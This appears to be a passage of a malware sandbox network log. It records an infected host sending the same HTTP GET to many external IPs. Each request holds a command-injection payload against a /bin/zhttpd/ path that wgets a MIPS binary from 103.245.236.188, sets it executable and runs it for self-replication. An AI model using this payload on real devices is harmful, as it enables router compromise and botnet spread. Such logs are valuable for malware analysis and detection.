                                                Jan 12, 2024 18:16:22.433053970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4253192.168.2.236015035.92.169.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433078051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4254192.168.2.2346036109.243.164.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433129072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4255192.168.2.2346292137.182.125.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433151960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4256192.168.2.2343948157.130.113.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433192968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4257192.168.2.2337086212.137.174.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433232069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4258192.168.2.2334654150.129.137.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433253050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4259192.168.2.235008899.158.61.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433320045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4260192.168.2.235083493.103.116.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433346033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4261192.168.2.233610647.138.181.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433391094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4262192.168.2.2355012152.48.118.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433415890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4263192.168.2.2335686158.155.166.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433474064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4264192.168.2.2348478217.197.37.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433511972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4265192.168.2.2333576195.104.188.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433566093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4266192.168.2.234456480.233.55.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433590889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4267192.168.2.2337066184.121.238.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433621883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4268192.168.2.2358668208.203.210.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433680058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4269192.168.2.2353274191.102.30.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433723927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4270192.168.2.2358852175.38.107.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433763027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4271192.168.2.2354108171.81.197.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433788061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4272192.168.2.2346070106.57.172.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433819056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4273192.168.2.2353980210.84.52.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433859110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4274192.168.2.235026287.212.47.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433902025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4275192.168.2.2356748114.97.167.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433921099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4276192.168.2.2336502161.39.70.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433969021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4277192.168.2.234007684.107.203.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.433979034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4278192.168.2.233613688.151.104.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434031963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4279192.168.2.2354900195.137.80.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434081078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4280192.168.2.233667861.226.70.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434111118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4281192.168.2.2354252208.249.102.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434150934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4282192.168.2.233620823.70.16.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434184074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4283192.168.2.234359818.95.188.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434237003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4284192.168.2.233874424.102.114.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434267998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4285192.168.2.234044035.31.177.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434295893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4286192.168.2.233707872.138.255.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434350967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4287192.168.2.2356332160.139.89.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434387922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4288192.168.2.233542259.78.212.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434422016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4289192.168.2.234569832.14.132.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434482098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4290192.168.2.2356692178.115.20.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434500933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4291192.168.2.234609471.124.134.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434534073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4292192.168.2.2334190209.184.126.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434581995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4293192.168.2.2338212208.208.90.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434617996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4294192.168.2.2352288122.108.44.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434660912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4295192.168.2.2341000219.76.38.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434717894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4296192.168.2.235802445.69.238.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434741974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4297192.168.2.235366453.151.130.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434788942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4298192.168.2.235440085.17.113.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434830904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4299192.168.2.2359948201.144.70.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434854031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4300192.168.2.2333002219.155.37.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434911013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4301192.168.2.235923420.223.215.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434936047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4302192.168.2.2344874139.44.172.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.434993029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4303192.168.2.235469066.48.89.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435048103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4304192.168.2.2332860182.151.134.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435074091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4305192.168.2.2348532148.108.164.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435107946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4306192.168.2.234554270.88.233.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435136080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4307192.168.2.235891299.70.143.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435169935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4308192.168.2.2351362216.203.255.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435201883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4309192.168.2.23438781.175.93.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435259104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4310192.168.2.234134675.91.87.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435293913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4311192.168.2.2341010153.222.220.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435314894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4312192.168.2.2358736149.192.190.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435345888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4313192.168.2.2333822139.188.169.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435399055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4314192.168.2.2351124208.66.203.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:22.435425043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4315192.168.2.2339968200.87.194.124443
                                                TimestampBytes transferredDirectionData
